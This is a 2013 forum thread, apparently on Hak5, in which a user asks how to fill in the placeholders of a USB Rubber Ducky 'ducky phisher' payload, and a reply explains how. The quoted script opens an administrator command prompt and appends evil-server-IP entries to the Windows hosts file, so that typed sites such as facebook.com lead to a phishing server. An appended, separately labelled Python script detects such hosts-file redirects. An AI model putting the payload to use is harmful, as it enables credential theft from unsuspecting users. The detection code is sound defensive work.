xstormx Posted September 10, 2013

Hey guys,

Do I replace the Green statements with the evil server IP and web address with or without the brackets and quotes?

Secondly, can someone decipher what this means "you need to add the www. version and with out it as well." in the 5th REM line?

Thanks in advance guys

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---ducky-phisher

```
REM Author: .:Koryusai-Kun:.
REM Description: Used for phishing, it adds an ip of your choosing to the hosts file on windows
REM Description: so when the user types into their web browser for example www.facebook.com it
REM Description: instead of going to the proper ip it goes to the one in the host file your evil one.
REM Description: you need to add the www. version and with out it as well.
REM ---[start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
Enter
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER
```
no42 Posted September 14, 2013

Just replace the green words and [ ], leave the "" in place.
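
A defensive counterpart to the payload discussed above, as an added example that is not part of the thread or the Hak5 wiki: the hosts file matches exact hostnames only, so a redirect shows up as separate lines for the bare and `www.` names, and a check has to normalize both. The watch list, function names and sample file contents below are constructed assumptions.

```python
import ipaddress

# Assumed watch list (bare domains); replace with the sites your users log in to.
WATCHED = {"facebook.com", "example.com"}

def parse_hosts(text):
    """Yield (lineno, ip, hostname) for every mapping in hosts-file text."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop trailing comments
        fields = line.split()
        if len(fields) < 2:
            continue                             # blank or comment-only line
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                             # first field is not an address
        for name in fields[1:]:                  # one line may carry several names
            yield lineno, ip, name.lower().rstrip(".")

def suspicious_entries(text, watched=WATCHED):
    """Return mappings that send a watched site (bare or www.) to a routable IP."""
    hits = []
    for lineno, ip, name in parse_hosts(text):
        bare = name[4:] if name.startswith("www.") else name
        # Loopback and 0.0.0.0 entries block a site rather than redirect it.
        if bare in watched and not ip.is_loopback and not ip.is_unspecified:
            hits.append((lineno, str(ip), name))
    return hits

# Constructed sample hosts file; 203.0.113.7 is a documentation-range address.
SAMPLE = """\
# constructed sample hosts file
127.0.0.1       localhost
0.0.0.0         www.facebook.com   # local block, not a redirect

203.0.113.7 facebook.com
203.0.113.7 www.facebook.com
10.0.0.5    intranet.corp.test
"""

if __name__ == "__main__":
    for lineno, ip, name in suspicious_entries(SAMPLE):
        print(f"hosts line {lineno}: {name} -> {ip}")
```

On a live Windows host the text to feed in is the content of `%WINDIR%\system32\drivers\etc\hosts`, the same file the payload appends to.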